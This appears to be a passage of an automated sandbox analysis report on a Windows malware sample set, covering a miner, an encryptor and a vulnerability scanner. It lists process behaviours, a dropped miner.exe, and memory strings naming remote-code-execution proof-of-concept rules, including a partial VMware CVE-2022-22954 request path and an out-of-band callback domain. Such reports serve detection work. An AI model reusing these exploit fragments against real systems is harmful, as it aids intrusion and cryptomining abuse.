          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\daemon.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\Temp\daemon.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\encrypt.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\Temp\encrypt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\daemon.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\Temp\daemon.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\daemon.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\Temp\daemon.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\daemon.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\Temp\daemon.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\scan.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\Temp\scan.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\Temp\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep count: 9577 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6000Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9374Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9577Jump to behavior
          Source: C:\Windows\Temp\daemon.exeDropped PE file which has not been started: C:\Windows\Temp\miner.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: fodhelper.exe, 00000003.00000002.348290653.000002DE9FD19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&+
          Source: scan.exeBinary or memory string: r2))) detail: author: B1anda0(https://github.com/B1anda0) links: - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A name: poc-yaml-CVE-2022-22954-VMware-RCE rules: - method: GET path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: %s %s `oneof=%t`%s overflows int(HUAWEI ASG2050)(HUAWEI ASG2100)(HUAWEI SRG1220)(HUAWEI SRG2220)(HUAWEI SRG3250)(VMware vSphere)(libs.useso.com)(sessioncookie=), ctx dependent=, not a function.WithValue(type 0123456789ABCDEF0123456789abcdef15:04:05.99999992384185791015625: value of type <stream: %p, %v>AdjustWindowRectAlready ReportedC:\Windows\Temp\CONFIG GET dir
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: sbquo;scalarsccue;scirc;scnap;scopedscriptscsim;sdotb;sdote;seArr;searr;secondseeyonselectsendtoserversetmn;sharp;sigma;silentsimeq;simgE;simlE;simne;slarr;smile;smtes;socketsocks socks5sqcap;sqcup;sqsub;sqsup;srarr;srcdocsrcsetsshkeystarf;state(statusstringstrns;structsubnE;subne;substrsupnE;supne;swArr;swarr;sweep sysmonsystemszlig;targettelnettheta;thkap;thorn;tilde;timerstimes;to_dyntoken(tongdatrade;trisb;tshcy;twixt;typeofuacuteubrcy;ucirc;udarr;udhar;ugraveuharl;uharr;uhblk;uint16uint32uint64ultri;umacr;unuseduogon;uplus;upsih;uring;urtri;usemaputdot;utrif;uuarr;vBarv;vDash;value:varpi;vdash;veeeq;vltri;vmwarevnsub;vnsup;vprop;vrtri;wcirc;weaverwedge;xcirc;xdtri;xhArr;xharr;xlArr;xlarr;xodot;xrArr;xrarr;xutri;yacuteyaml: ycirc;zabbix{user}
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHATLS_ECDHE_RSA_WITH_AES_256_CBC_SHAVirtualQuery for stack base failedadding nil Certificate to CertPoolattempted to parse unknown event: bad pointer in byte slice case in bad scalar length: %d, expected %dcan't evaluate field %s in type %scan't handle %s for arg of type %scan't parse %q as a decimal numberchacha20: wrong HChaCha20 key sizeconnection doesn't support Ed25519control characters are not allowedcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusdid not find expected node contentdoaddtimer: P already set in timerdriver: remove argument from queryduration: %v: seconds out of rangeexpected an RSA public key, got %Texpected comma after array elementexpression does not select a fieldflag provided but not defined: -%sforEachP: sched.safePointWait != 0google.api.expr.v1alpha1.EnumValuegoogle.api.expr.v1alpha1.EvalStategoogle.api.expr.v1alpha1.Expr.Callgoogle.api.expr.v1alpha1.ExprValuegoogle.api.expr.v1alpha1.ListValuegoogle.api.expr.v1alpha1.Referencegoogle.protobuf.FieldOptions_CTypegoogle.protobuf.Struct.FieldsEntrygrpc: message too large (%d bytes)http2: aborting request body writehttp: MultipartReader called twicehttp: connection has been hijackedhttp: persistConn.readLoop exitinghttp: read on closed response bodyi/o operation on closed connectionillegal base64 data at input byte in \u hexadecimal character escapeinvalid length of a UTF-8 sequenceinvalid nested repetition operatorinvalid or unsupported Perl syntaxinvalid padding bits in BIT STRINGmspan.ensureSwept: m is not lockednot implemented for read-only setsout of memory allocating allArenaspocs/CVE-2022-22954-VMware-RCE.ymlpocs/Hotel-Internet-Manage-RCE.ymlpocs/dedecms-cve-2018-7700-rce.ymlpocs/phpunit-cve-2017-9841-rce.ymlpocs/spon-ip-intercom-ping-rce.ymlpocs/webmin-cve-2019-15107-rce.ymlpocs/yonyou-grp-u8-sqli-to-rce.ymlproto: duplicate enum registered: proto: unexpected type %T in oneofprotobuf tag not enough fields in reflect.FuncOf: too many argumentsreflect: ChanDir of non-chan type reflect: Field index out of boundsreflect: Field of non-struct type reflect: Method index out of rangereflect: recv on send-only channelreflect: send on recv-only channelreflect: string index out of rangeruntime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workserver does not support encryptionslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]sql: expected %d arguments, got %dstream error: stream ID %d; %v; %vtimeout waiting for client prefacetls: malformed key_share extensiontoo many references: cannot splicetransport: error while dialing: %vunexpected fed auth info opt ID %dunexpected runtime.netpoll error: unpaired removeDep: no deps for %Tunsupported authentication method unsupported type %T, a slice of %svalue is nil; should be of type %sx509: Ed25519 verification failurex509: in
          Source: fodhelper.exe, 00000003.00000002.348290653.000002DE9FD19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: name: poc-yaml-CVE-2022-22954-VMware-RCE
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: description: "CVE-2022-22954-VMware-RCE by chaosec
          Source: fodhelper.exe, 00000003.00000002.348290653.000002DE9FD19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bcryptprimitives.dllfb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d2+
          Source: scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: .WithDeadline(.in-addr.arpa.190734863281257wtusr.ceye.io95367431640625: extra text: <not Stringer>Accept-CharsetApplyFunction;CertCloseStoreClientToScreenCloseClipboardCloseThemeDataCoInitializeExCoUninitializeComputerNameExContent-LengthControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomD:(A;;GA;;;WD)DATETIMEOFFSETDefWindowProcWDeferWindowPosDifferentialD;Dkim-SignatureDoubleLeftTee;DoubleUpArrow;DragQueryFileWEmptyClipboardFindFirstFileWFormatMessageWGC assist waitGC worker initGREATER_EQUALSGdiplusStartupGetConsoleModeGetLocaleInfoWGetProcAddressGetShellWindowGetStockObjectGetTickCount64GetUserNameExWGetWindowLongWINTERNAL_ERRORInstEmptyWidthInvalid typeidInvalidateRectIsWellKnownSidIsWow64ProcessLABEL_OPTIONALLABEL_REPEATEDLABEL_REQUIREDLL altSubSets=LOGGER_UNKNOWNLeftTeeVector;LeftVectorBar;LessFullEqual;LoadLibraryExWLongLeftArrow;Longleftarrow;MAX_FRAME_SIZEMB; allocated MSSQLSvc/%s:%dMakeAbsoluteSDMatchATN mode NetUserGetInfoNot AcceptableNot ComparableNotEqualTilde;NotTildeEqual;NotTildeTilde;OpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxPdhAddCounterWPoincareplane;PrecedesEqual;PrecedesTilde;Process32NextWQuotation_MarkRCodeNameErrorREFUSED_STREAMREQUEST_METHODRead CommittedRegSetValueExWReleaseCaptureRightArrowBar;RightTeeArrow;RightTriangle;RightUpVector;SET FMTONLY ONSHGetFileInfoWScreenToClientSetConsoleModeSetFilePointerSetPixelFormatSetThreadTokenSetWindowLongWSetWindowThemeSizeofResourceStack is emptySucceedsEqual;SucceedsTilde;SupersetEqual;SysAllocStringTranslateNameWUnable to readUpEquilibrium;VMware vSphereVerticalTilde;VeryThinSpace;VirtualProtectXXX_extensions"OUT_OF_RANGE"\.+*?()|[]{}^$accept-charsetallocfreetraceatmail-WebMailbad allocCountbad connectionbad record MACbad span statebad stack sizebigtriangleup;blacktriangle;bool_to_stringbytes_to_bytesconditionalAndcontent-lengthdata truncateddivide by zerodivideontimes;document startexplicit,tag:1fallingdotseq;file too largefinalizer waitformnovalidategcstoptheworldgetprotobynamegot INFO %d %sgreater_doublegreater_stringgreater_uint64grpc-trace-binhookleftarrow;int64_to_int64internal errorinvalid syntaxis a directorykey size wrongleftarrowtail;leftharpoonup;len of type %sless_timestamplevel 2 haltedlevel 3 haltedlongleftarrow;looparrowleft;matches_stringmeasuredangle;message is nilmultiply_int64need more datanil elem type!no module datano such devicentriangleleft;o2security_vpnpacket too bigpollCache.lockprotobuf_oneofprotocol errorruntime: full=s.allocCount= semaRoot queuesequence startshortparallel;show_sensitivesmallsetminus;stack overflowstart infoscanstopm spinningstore64 failedstring_to_boolsubtract_int64sync.Cond.Waittext file busytokenEnvChangetoo many linkstoo many userstriangleright;unexpected EOFunknown code: unknown error unknown methodunknown mode: unknown node: unreachable: unsafe.Pointerupharpoonleft;varbinary(max)varsubsetneqq;varsupsetneqq;weaver-ebridgewglCopyContextwglMakeCurrentwinapi error #work.full != 0work
          Source: scan.exeBinary or memory string: reenToClientSetConsoleModeSetFilePointerSetPixelFormatSetThreadTokenSetWindowLongWSetWindowThemeSizeofResourceStack is emptySucceedsEqual;SucceedsTilde;SupersetEqual;SysAllocStringTranslateNameWUnable to readUpEquilibrium;VMware vSphereVerticalTilde;VeryThinSp
          Source: scan.exeBinary or memory string: erstimes;to_dyntoken(tongdatrade;trisb;tshcy;twixt;typeofuacuteubrcy;ucirc;udarr;udhar;ugraveuharl;uharr;uhblk;uint16uint32uint64ultri;umacr;unuseduogon;uplus;upsih;uring;urtri;usemaputdot;utrif;uuarr;vBarv;vDash;value:varpi;vdash;veeeq;vltri;vmwarevnsub;vnsup
          Source: daemon.exe, 0000002F.00000002.439797260.0000023D01BB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: daemon.exe, 00000027.00000002.425024310.000001E7B7F28000.00000004.00000020.00020000.00000000.sdmp, daemon.exe, 00000032.00000002.458809032.0000021B6B18D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz
          Source: scan.exeBinary or memory string: valid padding bits in BIT STRINGmspan.ensureSwept: m is not lockednot implemented for read-only setsout of memory allocating allArenaspocs/CVE-2022-22954-VMware-RCE.ymlpocs/Hotel-Internet-Manage-RCE.ymlpocs/dedecms-cve-2018-7700-rce.ymlpocs/phpunit-cve-2017-98
          Source: scan.exeBinary or memory string: tus == 400 && "device id:".bmatches(response.body) detail: author: mamba description: "CVE-2022-22954-VMware-RCE by chaosec" links: - https://github.com/chaosec2021 name: poc-yaml-inspur-tscev4-cve-2020-21224-rce set: r1: ran
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B34AC0 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,56_2_00007FF650B34AC0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B78550 FindFirstFileExA,56_2_00007FF650B78550
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2E0E0 FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,56_2_00007FF650B2E0E0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B6AAF0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_00007FF650B6AAF0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B79990 GetProcessHeap,56_2_00007FF650B79990
